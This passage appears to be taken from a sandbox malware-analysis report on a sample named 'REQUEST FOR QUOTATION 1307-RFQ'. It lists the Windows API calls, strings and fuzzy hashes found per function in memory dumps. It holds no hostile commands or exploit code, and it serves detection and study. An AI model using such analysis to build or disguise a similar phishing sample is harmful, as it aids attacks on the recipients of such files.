                                                                                                                                                                                                                                • Part of subcall function 00B22096: GetLastError.KERNEL32(?,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?,?), ref: 00B220BE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2255A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2256F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2257A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2259C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B225AF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B225BD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B225C8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B22600
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B22607
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B22624
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2263C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 5e3b5dd230edbc5c0d35ee4a4b66fff991727813f49a1b1ea1bd650b6ab7ad78
                                                                                                                                                                                                                              • Instruction ID: 1054cab1027cc0361437b24f57fcb8ed9de894c70f11dba4e0a9aa2ee86e45e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e3b5dd230edbc5c0d35ee4a4b66fff991727813f49a1b1ea1bd650b6ab7ad78
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00313A72A00321ABEB31AB78E846B56B3E8FF10751F1088A9E45ED6161DE75ED80CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0047890E
                                                                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                              • String ID: ,,I
                                                                                                                                                                                                                              • API String ID: 2395222682-4163367948
                                                                                                                                                                                                                              • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                                                                                              • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                              • API String ID: 3964851224-909552448
                                                                                                                                                                                                                              • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                                                                                              • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                                • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: SendString$_memmove
                                                                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                              • API String ID: 2279737902-1007645807
                                                                                                                                                                                                                              • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                                                                                              • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                                                                                                                              • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                                                                                              • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00464F7A
                                                                                                                                                                                                                                • Part of subcall function 0042049F: timeGetTime.WINMM(?,75C0B400,00410E7B), ref: 004204A3
                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                                                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                                                                                                                                                              • SetActiveWindow.USER32 ref: 0046500B
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                                                                                                                                                              • IsWindow.USER32 ref: 0046504F
                                                                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 00465060
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                              • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                                                                                              • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                                                                                                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                                                                                                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                                                                              • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                                                                                              • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                                                                                                                                                              • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 641708696-0
                                                                                                                                                                                                                              • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                                                                                              • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                                                                              • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                                                                                              • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                              • API String ID: 2820617543-1000479233
                                                                                                                                                                                                                              • Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                                                                                                                                                                                                              • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0048716A
                                                                                                                                                                                                                              • CreateMenu.USER32 ref: 00487185
                                                                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 00487237
                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00487241
                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00487276
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                              • String ID: 0$F
                                                                                                                                                                                                                              • API String ID: 176399719-3044882817
                                                                                                                                                                                                                              • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                                                                                              • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
